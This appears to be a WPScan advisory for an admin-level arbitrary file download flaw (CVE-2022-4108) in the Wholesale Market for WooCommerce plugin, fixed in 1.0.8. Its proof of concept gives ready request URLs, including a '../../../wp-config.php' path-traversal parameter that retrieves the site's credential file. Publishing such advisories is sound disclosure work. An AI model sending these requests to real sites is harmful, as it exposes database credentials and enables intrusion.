Wholesale Market for WooCommerce < 1.0.8 – Admin+ Arbitrary File Download | CVE 2022-4108 | Plugin Vulnerabilities

Description

The plugin does not validate user input used to generate system path, allowing high privilege users such as admin to download arbitrary file from the server even when they should not be able to (for example in multisite)

Proof of Concept

First call https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv which will create the log directory

Then call http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&nonce=&ced_cwsm_log_download=../../../wp-config.php to download the wp-config.php

Affects Plugins

wholesale-market-for-woocommerce

Fixed in 1.0.8

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

9d1770df-91f0-41e3-af0d-522ae4e62470

Timeline

Publicly Published

2022-11-28 (about 3 years ago)

Added

2022-11-28 (about 3 years ago)

Last Updated

2022-11-28 (about 3 years ago)

Other

Published

Title

Published

2022-11-28

Title

Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download

Published

2025-12-11

Title

Secure Copy Content Protection and Content Locking < 4.9.3 - Unauthenticated Sensitive Information Exposure via Exposed CSV Export File

Published

2022-03-29

Title

uDraw < 3.3.3 - Unauthenticated Arbitrary File Access

Published

2022-07-11

Title

Project Source Code Download <= 1.0.0 - Unauthenticated Backup Download

Published

2025-11-20

Title

Import WP – Export and Import CSV and XML files to WordPress < 2.14.18 - Unauthenticated Information Exposure